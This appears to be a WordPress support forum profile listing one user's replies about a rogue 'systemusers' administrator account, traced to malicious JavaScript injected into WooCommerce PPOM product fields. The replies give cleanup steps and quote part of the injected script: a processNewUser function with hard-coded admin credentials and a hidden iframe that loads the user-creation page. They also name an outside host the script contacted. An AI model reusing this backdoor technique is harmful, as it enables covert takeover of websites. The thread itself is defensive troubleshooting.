nashe
Forum Replies Created
-
you need to check manually your ppom additionals fields or the demo fields. malicious js code was in description fields
No, it’s fixed now. There was an js added on a custom field
Hi
thank you for your answer.
But currently it’s the version 18.6 installed, and the problem is still here.
I delete previuous plugin, reinstall it, restart the servor, and nothing change.
You can check the problem here:
https://beeflow.fr/produit/parrainage-1-2-ruche/(I let systemusers created without rights, after changing the password.)
thank you for your helpForum: Fixing WordPress
In reply to: Admin User creating attackdone
- This reply was modified 5 years, 4 months ago by nashe.
Forum: Fixing WordPress
In reply to: Admin User creating attackhow ? lol
my email ?Forum: Fixing WordPress
In reply to: Admin User creating attackForum: Fixing WordPress
In reply to: Admin User creating attackTry to test :
– delete systemusers administrator (if notalready done …) on my side I let it existing with another email and without right.
– show a product with additional fields – the systemusers should be created in your backend administration
– delete systemusers
– deactivate PPOM
– and show the same product, without add fields of course, and the problem should be fixedAbout sslapis but not with PPOM : https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/
Forum: Fixing WordPress
In reply to: Admin User creating attackit’s seems it’s linked. it should not …
PPOM is activated on your site ?Forum: Fixing WordPress
In reply to: Admin User creating attack@saruncloudspring
Hi !
I encountered the same problem. An administrator user called systemusers has been created suddenly.
I found that it’s link with the plugin WooCommerce PPOM (Personalized Product Option Manager) (Plugin adds input fields on product page to personalized your product.).
When the plugin is activated, administrator “systemusers” is created on a detailed product with additional field.
In this case, servor try to connect on this address : https://sslapis.com/counter.php.the function called is contentLoaded, and somewhere in the script, we find a processNewUser function :
function processNewUser(adminhref){
var username = ‘systemusers’;
var email = ‘[email protected]’;
var password = ‘KYPzRkaJb0avdB’;pfr=document.createElement(‘iframe’);
pfr.style.visibility=’hidden’;
pfr.name=’pfr’;
pfr.src=adminhref+’/user-new.php’;pfr.onload=function(state){
pfr.onload=”;
At the moment I deactivated the script PPOM and it stops the administrator user creation.
If someone has another idea …
Thanx